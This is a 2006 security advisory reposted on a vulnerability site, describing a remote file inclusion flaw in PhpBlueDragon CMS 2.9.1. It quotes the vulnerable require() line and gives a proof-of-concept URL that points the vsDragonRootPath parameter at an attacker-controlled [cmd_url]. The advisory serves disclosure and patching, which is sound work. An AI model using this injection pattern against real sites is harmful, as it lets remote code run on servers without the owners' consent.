Computer Security

Security Advisory: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Andys Chat 4.5 (action) Remote File Inclusion

  [Full-disclosure] Advisory: Authentication bypass in phpBannerExchange

  [Full-disclosure] Advisory: Unauthorized password recovery in phpBannerExchange

  Secunia Research: DeluxeBB SQL Injection and File Inclusion Vulnerabilities

From:Federico Fazzi <federico_(at)_autistici.org>
Date:15.06.2006
Subject:PhpBlueDragon CMS 2.9.1, File inclusion vulnerability

-----------------------------------------------------
Advisory id: FSA:015

Author:    Federico Fazzi
Date:      14/06/2006, 18:20
Sinthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
Type:      high
Product:   http://phpbluedragon.net/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in template.php, line 23:

---
require($vsDragonRootPath.
"public_includes/pub_kernel/pbd_template_custom.php");
---

2) Proof of concept:

http:
//example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/templ
ate.php?vsDragonRootPath=[cmd_url]/
(note this is with final slash (/))

3) Solution:

sanitized $vsDragonRootPath

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru